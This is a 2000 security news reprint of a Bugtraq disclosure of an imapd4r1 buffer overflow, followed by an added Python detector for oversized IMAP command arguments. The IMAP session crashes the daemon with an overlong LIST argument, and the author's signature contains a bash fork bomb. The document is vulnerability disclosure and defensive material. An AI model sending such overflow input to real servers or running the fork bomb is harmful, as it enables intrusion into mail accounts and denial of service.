| Originally published: Monday, 17 April 2000 | Author: Alexander Reelsen |
| Published to: news_enhance_security/Security News |
imapd4r1 v12.264 exploit

The imap daemon shipped with the newest Red Hat has a security hole that allows an intruder to get shell access to the mail account.

From: Michal Zalewski
Subject: imapd4r1 v12.264
To: BUGTRAQ@SECURITYFOCUS.COM
Newest RH:
    * OK nimue IMAP4rev1 v12.264 server ready
    1 login lcamtuf test
    1 OK LOGIN completed
    1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
*sigh*
Privileges seem to be dropped, but, anyway, it's a nice way to get shell access to a mail account, maybe grab some data from memory etc. I believe both imap and ipopd packages need a code security audit.
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
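
A defensive check for the pattern in the session above, added here as an example and not part of the original post or of the imapd code: it parses client IMAP command lines and flags any whose argument is longer than a policy limit. The 1024-character limit, the function names and the sample lines are assumptions constructed for illustration; the post does not state the size of the buffer involved.

```python
import re

# Assumed policy limit; the post does not give the buffer size in imapd.
MAX_ARG_LEN = 1024

# One token is either a quoted string (backslash escapes allowed) or an atom.
_TOKEN = re.compile(r'"((?:[^"\\]|\\.)*)"|(\S+)')


def parse_command(line):
    """Split one client line into (tag, COMMAND, [arguments]), or None."""
    tokens = [atom or quoted
              for quoted, atom in _TOKEN.findall(line.rstrip("\r\n"))]
    if len(tokens) < 2:
        return None  # not a "tag SP command" line
    return tokens[0], tokens[1].upper(), tokens[2:]


def oversized_commands(lines, limit=MAX_ARG_LEN):
    """Return (line_no, tag, command, longest_arg_len) for each line
    whose longest argument exceeds the limit."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        parsed = parse_command(line)
        if parsed is None:
            continue
        tag, command, args = parsed
        longest = max((len(arg) for arg in args), default=0)
        if longest > limit:
            hits.append((line_no, tag, command, longest))
    return hits


# Constructed sample: the client side of a session shaped like the one in
# the post. The 4000-character argument length is made up for the example.
SAMPLE = [
    "1 login lcamtuf test\r\n",
    '1 list "" INBOX\r\n',
    '2 list "" ' + "A" * 4000 + "\r\n",
    '3 select "Sent Mail"\r\n',
]

if __name__ == "__main__":
    for line_no, tag, command, size in oversized_commands(SAMPLE):
        print(f"line {line_no}: tag={tag} {command} argument of "
              f"{size} characters exceeds {MAX_ARG_LEN}")
```

Because the crash in the post happens after LOGIN completes, each hit is worth correlating with the account that authenticated on that connection.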